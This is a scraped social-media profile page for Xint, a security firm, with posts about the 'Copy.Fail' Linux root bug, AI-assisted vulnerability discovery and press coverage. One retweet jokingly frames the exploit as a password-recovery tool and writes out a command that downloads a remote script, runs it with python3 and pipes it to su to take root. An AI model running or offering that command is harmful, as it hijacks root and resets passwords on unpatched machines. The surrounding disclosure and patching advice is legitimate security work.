Xint

106 posts

Xint banner
Xint

Xint

@xint_official

What if the world's best hackers rebuilt AppSec from the ground up with AI? Meet Xint - autonomous, comprehensive, fast, and actionable.

Katılım Şubat 2026
11 Takip Edilen544 Takipçiler
Xint retweetledi
jinmo123
jinmo123@jinmo123·
One of the craziest bug in Linux history. This doesn't even need race condition like DirtyCOW. Disable algif_aead module immediately as described there😲
Xint@xint_official

Patch your Linux boxes! Copy.Fail is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. Found by the teams at @theori_io and @xint_official More details below xint.io/blog/copy-fail…

English
0
5
29
4K
Xint retweetledi
5unkn0wn
5unkn0wn@5unKn0wn·
This is my first Linux kernel exploit for Google kCTF, and the patch commit is now public: git.kernel.org/pub/scm/linux/… Actually, this bug was found by AI while analyzing 1-day variants, I'd like to share my approach for these AI things to find bug, and exploitation write-up later.
5unkn0wn tweet media
English
6
61
566
33.4K
Xint
Xint@xint_official·
@0xblacklight Coordinated disclosure with the Linux kernel security team — the fix landed in mainline on April 1. We are now able to talk about it publicly and using this opportunity to remind organizations running Linux infra to patch
English
0
0
0
50
Xint retweetledi
Brian Pak
Brian Pak@brian_pak·
Surfaced by Xint Code — our AI vuln research platform — pointed at the kernel's crypto/ for about an hour, on a starting hunch from @5unKn0wn. Came back with CopyFail (plus others, still in coordinated disclosure). Write-up + PoC (exploit): copy.fail Xint Code: code.xint.io
English
3
22
199
24.9K
Xint retweetledi
Brian Pak
Brian Pak@brian_pak·
Origin: a "harmless" 2017 in-place optimization in algif_aead. Nobody noticed for 9 years. Every distro. Same bug. Same 732 bytes.
English
4
4
129
22.2K
Xint retweetledi
Brian Pak
Brian Pak@brian_pak·
The bug: a straight-line logic flaw in authencesn, reachable from any unprivileged user via AF_ALG, chained through splice() into a 4-byte page-cache write. 4 bytes, on the right page, to root.
English
1
3
131
22.8K
Xint retweetledi
Tim Becker
Tim Becker@tjbecker·
Very cool Linux bug found by @xint_official 100% reliable, instant LPE from a portable python script that works on all platforms and distros. Root cause is a subtle logic bug at the intersection of several subsystems. I highly recommend patching and checking out the details!
Xint@xint_official

Patch your Linux boxes! Copy.Fail is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. Found by the teams at @theori_io and @xint_official More details below xint.io/blog/copy-fail…

English
7
11
95
12K
Xint retweetledi
Juno
Juno@junorouse·
We (@xint_official ) released the 2026 version of Universal Linux Password Recovery Tool. Forgot your root password? $ curl copy.fail/pw | TARGET_USER=root python3 | su It recovers your lost password and resets it to: "xint.io" (without quote)
Juno tweet media
English
24
116
882
100.7K
Xint
Xint@xint_official·
Patch your Linux boxes! Copy.Fail is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. Found by the teams at @theori_io and @xint_official More details below xint.io/blog/copy-fail…
English
10
195
499
87.4K
Xint retweetledi
Brian Pak
Brian Pak@brian_pak·
a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9 👀
Português
5
5
92
269.5K
Xint retweetledi
Tim Becker
Tim Becker@tjbecker·
The Verge published a new article with quotes from several industry experts on how AI is impacting vulnerability discovery and exploitation. Also, it has great art! Check it out
Xint@xint_official

'Before [Xint security researcher @tjbecker] started working on automatic bug finding with AI, he worked on vulnerability research, finding zero days and reporting them to maintainers. He said it used to take him weeks or months to find a high-impact vulnerability in a brand-new codebase, and now it only takes hours. “I just drop the code into our AI bug-finding tool [Xint] and in a couple hours I get a report with a bunch of candidate vulnerabilities, and most of them end up checking out and being real issues,” he said. “The bar to diving into a new million-line codebase and finding a bug is so much lower than it used to be.”' Great report from @verge looking into the new era of cybersecurity, where even non-technical attackers can use AI to find the weaknesses in the apps and networks of organizations faster and at a scale never thought possible before. theverge.com/ai-artificial-…

English
2
3
18
3.3K
Xint
Xint@xint_official·
Here's where you have to go beyond bug finding. From what we see, without proper scaffolding LLMs are generating so many false positives that it's like taking a needle from a haystack (real vuln in a sea of code) and dropping it into a stack of staples (real vuln in a sea of things that look like vulns but aren't). This is the difference between software that finds bugs and a real platform for security teams - how much does it accelerate not just discovery but the whole triage process (validation, sev assessment, remediation). We have a whole system for filtering out false positives but more importantly trigger/impact reports that are so detailed you can get a POC in minutes and a patch almost as fast. This is why we think defenders can stay ahead of attackers Here's a cool example of how we were able to go from discovery to validation to patched with less than 45 minutes TOTAL of human intervention: xint.io/blog/finding-a…
English
0
0
1
213
Jeremie Strand
Jeremie Strand@jeremie_strand·
@xint_official @tjbecker Weeks to hours is a massive compression. The real question is whether defenders get the same speedup or if offense stays ahead just because the attack surface is so much bigger than what any tool can harden.
English
1
0
2
301
Xint
Xint@xint_official·
'Before [Xint security researcher @tjbecker] started working on automatic bug finding with AI, he worked on vulnerability research, finding zero days and reporting them to maintainers. He said it used to take him weeks or months to find a high-impact vulnerability in a brand-new codebase, and now it only takes hours. “I just drop the code into our AI bug-finding tool [Xint] and in a couple hours I get a report with a bunch of candidate vulnerabilities, and most of them end up checking out and being real issues,” he said. “The bar to diving into a new million-line codebase and finding a bug is so much lower than it used to be.”' Great report from @verge looking into the new era of cybersecurity, where even non-technical attackers can use AI to find the weaknesses in the apps and networks of organizations faster and at a scale never thought possible before. theverge.com/ai-artificial-…
English
1
4
32
7.7K
Xint retweetledi
Ckrielle
Ckrielle@ckrielle·
Another i0rs post, this time from @0x3dward who takes it upon himself to write a POC for a recently discovered heap buffer overflow in PostgreSQL's pgcrypto leading to RCE, originally discovered by team @xint_official. Enjoy🤘🔥 i0.rs/blog/smashing-…
English
1
23
90
5.1K
Xint
Xint@xint_official·
"Why would I pay you when Claude Enterprise now bundles security scanning?" This question assumes that the model is the product. But real AppSec is more than just finding vulnerabilities. To actually be useful to #productsecurity teams you need to know what to target, how to validate findings, how to prevent false positives from drowning teams, how to know which of the true positives are worth patching, and more. See what's the difference between software that can find bugs and a true AppSec platform xint.io/blog/167832
English
0
0
2
140
Xint
Xint@xint_official·
Our cofounder/CTO and VP of Product were interviewed as part of this article from @IEEESpectrum about what the ramifications are for the launch of #mythos. In short, finding 0days has been a capability that LLMs have demonstrated for the past year with Mythos providing an incremental improvement. But the new bottleneck has become the validation, severity assessment, and remediation of these bugs. spectrum.ieee.org/anthropic-clau…
English
1
1
4
600

Keşfet

@0xblacklight @uglybyte @5unKn0wn @theori_io @tjbecker @verge @0x3dward @elonmusk